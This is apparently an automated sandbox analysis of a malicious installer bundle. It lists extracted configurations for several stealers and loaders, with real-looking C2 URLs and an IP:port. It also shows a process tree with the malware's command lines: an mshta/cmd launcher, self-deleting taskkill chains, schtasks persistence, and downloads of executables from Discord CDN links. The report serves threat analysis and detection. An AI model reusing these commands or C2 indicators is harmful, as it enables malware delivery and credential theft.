Analysis
-
max time kernel
628s -
max time network
947s -
submitted
01-01-1970 00:00
General
-
Target
setup_installer/Wed09d8d6edfaff2ac.exe
Malware Config
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
dd3
91.206.14.151:16764
Extracted
raccoon
8dec62c1db2959619dca43e02fa46ad7bd606400
-
url4cnc
http://telegin.top/capibar
http://ttmirror.top/capibar
http://teletele.top/capibar
http://telegalive.top/capibar
http://toptelete.top/capibar
http://telegraf.top/capibar
https://t.me/capibar
Extracted
vidar
41.6
937
https://mas.to/@lilocc
-
profile_id
937
Extracted
smokeloader
2020
http://xacokuo8.top/
http://hajezey1.top/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Xloader
Xloader is a rebranded version of Formbook malware.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 4 IoCs
-
Xloader Payload 3 IoCs
-
Blocklisted process makes network request 49 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
Tries to connect to .bazar domain 4 IoCs
Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 20 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 14 IoCs
-
Drops file in Program Files directory 32 IoCs
-
Drops file in Windows directory 40 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
-
NSIS installer 4 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 5 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 14 IoCs
-
Modifies Internet Explorer settings 1 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 20 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 15 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d8d6edfaff2ac.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09d8d6edfaff2ac.exe"2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\Qu_WohR0tI87C3AfKfhmXFyG.exe"C:\Users\Admin\Pictures\Adobe Films\Qu_WohR0tI87C3AfKfhmXFyG.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\3TDDreoalXStRp0YHLpqmaSH.exe"C:\Users\Admin\Pictures\Adobe Films\3TDDreoalXStRp0YHLpqmaSH.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\GK4GFqbjsH2HYovJYKYc6tyV.exe"C:\Users\Admin\Pictures\Adobe Films\GK4GFqbjsH2HYovJYKYc6tyV.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\GK4GFqbjsH2HYovJYKYc6tyV.exe"C:\Users\Admin\Pictures\Adobe Films\GK4GFqbjsH2HYovJYKYc6tyV.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Tka4GLMhci3dpdY3ipK4yjnX.exe"C:\Users\Admin\Pictures\Adobe Films\Tka4GLMhci3dpdY3ipK4yjnX.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\Tka4GLMhci3dpdY3ipK4yjnX.exe"C:\Users\Admin\Pictures\Adobe Films\Tka4GLMhci3dpdY3ipK4yjnX.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\AqbsSAWjIF95dlsir5tBrCTU.exe"C:\Users\Admin\Pictures\Adobe Films\AqbsSAWjIF95dlsir5tBrCTU.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\AqbsSAWjIF95dlsir5tBrCTU.exe"C:\Users\Admin\Pictures\Adobe Films\AqbsSAWjIF95dlsir5tBrCTU.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\GTTSfQYHV2N6TTHeMFj7ShrN.exe"C:\Users\Admin\Pictures\Adobe Films\GTTSfQYHV2N6TTHeMFj7ShrN.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\9kYgyvLJm4aukV8DwhZPZSwY.exe"C:\Users\Admin\Documents\9kYgyvLJm4aukV8DwhZPZSwY.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\w5y6A300YTGDb2DZdDBJtBmh.exe"C:\Users\Admin\Pictures\Adobe Films\w5y6A300YTGDb2DZdDBJtBmh.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\OIBWL5yIftLAW87fQqoFq2Cu.exe"C:\Users\Admin\Pictures\Adobe Films\OIBWL5yIftLAW87fQqoFq2Cu.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 6406⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 6766⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\wR1eWv7uzbBRCxYPLpe5WAqV.exe"C:\Users\Admin\Pictures\Adobe Films\wR1eWv7uzbBRCxYPLpe5WAqV.exe"5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\wR1eWv7uzbBRCxYPLpe5WAqV.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\wR1eWv7uzbBRCxYPLpe5WAqV.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\wR1eWv7uzbBRCxYPLpe5WAqV.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\wR1eWv7uzbBRCxYPLpe5WAqV.exe" ) do taskkill -f -iM "%~NxM"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "wR1eWv7uzbBRCxYPLpe5WAqV.exe"8⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\cvQZB6BW3yaznh1bSo4i5mZK.exe"C:\Users\Admin\Pictures\Adobe Films\cvQZB6BW3yaznh1bSo4i5mZK.exe"5⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\N2Bgz47QQk2PPgWwnBd_1jSh.exe"C:\Users\Admin\Pictures\Adobe Films\N2Bgz47QQk2PPgWwnBd_1jSh.exe"5⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\GkBi2jVwIuhDT4sJMB1P6vmO.exe"C:\Users\Admin\Pictures\Adobe Films\GkBi2jVwIuhDT4sJMB1P6vmO.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QRNQF.tmp\GkBi2jVwIuhDT4sJMB1P6vmO.tmp"C:\Users\Admin\AppData\Local\Temp\is-QRNQF.tmp\GkBi2jVwIuhDT4sJMB1P6vmO.tmp" /SL5="$20462,506127,422400,C:\Users\Admin\Pictures\Adobe Films\GkBi2jVwIuhDT4sJMB1P6vmO.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-8CGEA.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-8CGEA.tmp\DYbALA.exe" /S /UID=27097⤵
-
C:\Users\Admin\AppData\Local\Temp\MAPXJHWCHF\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\MAPXJHWCHF\foldershare.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\39-bf303-c6a-e8799-24716199f53ad\Dopecyqaezhy.exe"C:\Users\Admin\AppData\Local\Temp\39-bf303-c6a-e8799-24716199f53ad\Dopecyqaezhy.exe"8⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\4c-3be00-874-a4997-27babe2ffa01a\Lyliqivaemae.exe"C:\Users\Admin\AppData\Local\Temp\4c-3be00-874-a4997-27babe2ffa01a\Lyliqivaemae.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rnr1osbu.ve4\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\rnr1osbu.ve4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\rnr1osbu.ve4\GcleanerEU.exe /eufive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l2mryzwp.jo0\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\l2mryzwp.jo0\installer.exeC:\Users\Admin\AppData\Local\Temp\l2mryzwp.jo0\installer.exe /qn CAMPAIGN="654"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4x5wodpm.lb3\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\4x5wodpm.lb3\any.exeC:\Users\Admin\AppData\Local\Temp\4x5wodpm.lb3\any.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\4x5wodpm.lb3\any.exe"C:\Users\Admin\AppData\Local\Temp\4x5wodpm.lb3\any.exe" -u11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2uajpguo.4uh\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\2uajpguo.4uh\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\2uajpguo.4uh\gcleaner.exe /mixfive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eyjcefvp.usm\autosubplayer.exe /S & exit9⤵
-
C:\Users\Admin\Pictures\Adobe Films\d8eD98JC7PAw7_sfSCyTpe8Z.exe"C:\Users\Admin\Pictures\Adobe Films\d8eD98JC7PAw7_sfSCyTpe8Z.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\d8eD98JC7PAw7_sfSCyTpe8Z.exe"C:\Users\Admin\Pictures\Adobe Films\d8eD98JC7PAw7_sfSCyTpe8Z.exe" -u6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\PccMFcI8QJ4gmnZtKaw62afP.exe"C:\Users\Admin\Pictures\Adobe Films\PccMFcI8QJ4gmnZtKaw62afP.exe"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=16⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"7⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1d0,0x1d4,0x1d8,0x1ac,0x1dc,0x7ffdad56dec0,0x7ffdad56ded0,0x7ffdad56dee08⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff6f0e29e70,0x7ff6f0e29e80,0x7ff6f0e29e909⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,13489780384475645565,2325436540787419764,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4668_1747503582" --mojo-platform-channel-handle=1632 /prefetch:88⤵
-
C:\Users\Admin\Pictures\Adobe Films\kb_r5hw3oxydB5nBjKR5Z2CN.exe"C:\Users\Admin\Pictures\Adobe Films\kb_r5hw3oxydB5nBjKR5Z2CN.exe"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\Pictures\Adobe Films\IEqfgvZXecsZgHiA5BQQCmyb.exe"C:\Users\Admin\Pictures\Adobe Films\IEqfgvZXecsZgHiA5BQQCmyb.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\DBA8.bat "C:\Users\Admin\Pictures\Adobe Films\IEqfgvZXecsZgHiA5BQQCmyb.exe""4⤵
-
C:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""5⤵
-
C:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902902974442000446/902903105925021696/18.exe" "18.exe" "" "" "" "" "" ""5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902902974442000446/902903166096531536/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\5362\18.exe18.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5362\Transmissibility.exeTransmissibility.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\extd.exe "" "" "" "" "" "" "" "" ""5⤵
-
C:\Users\Admin\Pictures\Adobe Films\zD55o5Ytcpi1EVLoNwwxaQU3.exe"C:\Users\Admin\Pictures\Adobe Films\zD55o5Ytcpi1EVLoNwwxaQU3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im zD55o5Ytcpi1EVLoNwwxaQU3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\zD55o5Ytcpi1EVLoNwwxaQU3.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im zD55o5Ytcpi1EVLoNwwxaQU3.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\yiC_BJ2UYm2rDib_H_ihE6M4.exe"C:\Users\Admin\Pictures\Adobe Films\yiC_BJ2UYm2rDib_H_ihE6M4.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\Es8HsWH2FYAoN3GT_ZxLHKBr.exe"C:\Users\Admin\Pictures\Adobe Films\Es8HsWH2FYAoN3GT_ZxLHKBr.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3688 -s 2404⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\uF2Ub1RO_SjZmNeP3yX5QZM8.exe"C:\Users\Admin\Pictures\Adobe Films\uF2Ub1RO_SjZmNeP3yX5QZM8.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 6644⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 6764⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 6964⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 6844⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 11324⤵
- Executes dropped EXE
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 11564⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 11844⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "uF2Ub1RO_SjZmNeP3yX5QZM8.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\uF2Ub1RO_SjZmNeP3yX5QZM8.exe" & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "uF2Ub1RO_SjZmNeP3yX5QZM8.exe" /f5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\WRkGWJ0h83lpxcCwlOVP0pKS.exe"C:\Users\Admin\Pictures\Adobe Films\WRkGWJ0h83lpxcCwlOVP0pKS.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 8484⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\sJgVyPfX0foZ3hAhLpiXLjRH.exe"C:\Users\Admin\Pictures\Adobe Films\sJgVyPfX0foZ3hAhLpiXLjRH.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exesvchost.exe4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv4⤵
-
C:\Windows\SysWOW64\cmd.execmd5⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e8⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e10⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e12⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e13⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e14⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e15⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e16⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e17⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e18⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e19⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e20⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e21⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e22⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e23⤵
- Suspicious use of SendNotifyMessage
-
